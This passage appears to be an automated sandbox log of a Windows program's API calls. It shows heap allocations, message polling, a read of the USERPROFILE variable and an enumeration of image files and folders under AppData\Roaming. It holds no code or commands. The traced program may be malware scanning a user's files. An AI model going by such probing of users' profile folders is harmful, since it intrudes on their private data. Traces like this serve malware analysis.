RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa968 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0190.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0190.495] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf2c0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0190.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0190.495] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0190.495] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.495] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.496] CharUpperBuffW (in: lpsz="SSA4B00E03609", cchLength=0xd | out: lpsz="SSA4B00E03609") returned 0xd [0190.496] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.496] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.496] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0190.496] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.496] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.497] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0190.497] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.497] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0190.497] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240c948 [0190.498] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming\\*.*", lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcf239a70, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xcf239a70, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x995000c, dwReserved1=0x70, cFileName=".", cAlternateFileName="")) returned 0xaa58a0 [0190.498] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcf239a70, ftLastAccessTime.dwHighDateTime=0x1d509d6, ftLastWriteTime.dwLowDateTime=0xcf239a70, ftLastWriteTime.dwHighDateTime=0x1d509d6, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x995000c, dwReserved1=0x70, cFileName="..", cAlternateFileName="")) returned 1 [0190.498] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e4023a0, ftCreationTime.dwHighDateTime=0x1d4d428, ftLastAccessTime.dwLowDateTime=0xc4185b80, ftLastAccessTime.dwHighDateTime=0x1d4d569, ftLastWriteTime.dwLowDateTime=0xc4185b80, ftLastWriteTime.dwHighDateTime=0x1d4d569, nFileSizeHigh=0x0, nFileSizeLow=0xd7f5, dwReserved0=0x995000c, dwReserved1=0x70, cFileName="5fNAF_eBT37aF.bmp", cAlternateFileName="5FNAF_~1.BMP")) returned 1 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f170 [0190.498] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.498] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.498] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.498] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac978 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.499] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.499] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.499] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b36f8 [0190.499] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.500] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.500] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8e930fb0, ftCreationTime.dwHighDateTime=0x1d4cf9b, ftLastAccessTime.dwLowDateTime=0xb11a3d40, ftLastAccessTime.dwHighDateTime=0x1d4d56f, ftLastWriteTime.dwLowDateTime=0xb11a3d40, ftLastWriteTime.dwHighDateTime=0x1d4d56f, nFileSizeHigh=0x0, nFileSizeLow=0x552a, dwReserved0=0x24a9bd0, dwReserved1=0x25c6e50, cFileName="7sqV8uLS.bmp", cAlternateFileName="")) returned 1 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.500] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.500] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.500] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0190.501] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.501] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.501] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="Adobe", cAlternateFileName="")) returned 1 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0190.501] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.501] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.501] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.502] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.502] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.502] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0190.502] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb17d7350, ftCreationTime.dwHighDateTime=0x1d4d237, ftLastAccessTime.dwLowDateTime=0x74f69c30, ftLastAccessTime.dwHighDateTime=0x1d4cb53, ftLastWriteTime.dwLowDateTime=0x74f69c30, ftLastWriteTime.dwHighDateTime=0x1d4cb53, nFileSizeHigh=0x0, nFileSizeLow=0x14d34, dwReserved0=0x24a9bd0, dwReserved1=0x25c6e50, cFileName="AX5eJBJ82y3.jpg", cAlternateFileName="AX5EJB~1.JPG")) returned 1 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.502] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0190.503] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.503] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.503] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b39d0 [0190.503] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ce8 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0190.503] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0190.504] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.504] 